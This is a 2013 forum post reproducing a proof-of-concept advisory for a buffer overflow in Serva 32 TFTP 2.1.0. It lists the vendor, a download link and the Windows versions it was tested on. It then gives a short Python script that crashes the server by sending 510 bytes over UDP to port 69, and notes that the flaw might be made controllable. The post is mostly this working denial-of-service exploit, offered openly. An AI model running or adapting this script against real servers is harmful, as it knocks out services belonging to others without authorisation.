Kwelwild Posted May 15, 2013 Report Posted May 15, 2013 Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of service#Serva 32 TFTP Buffer overflow DoS##05/14/2013#Sapling#Vendor homepage http://www.vercot.com/#Software Link:#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip#Version 2.1.0 Only prior versions are not vulnerable#Tested on Windows 8, Windows 7, Windows XP SP1-3#CVE to be established today or tomorrow.##This is the serva 32 Proof Of Concept exploit discovered and written bySapling. At this#time the exploit is only a denial of service but evidence show it may becontrollable.#The difficulty with controlling it at this point was the failure tooverwrite the SEH#chains or bypass them. The crash occurs when sending a message longer than509 bytes long#start of python fileimport sysimport socketnew = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)new.connect(('192.168.1.19', 69))new.send('\x41'*510)#end of python fileSursa: Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of service Quote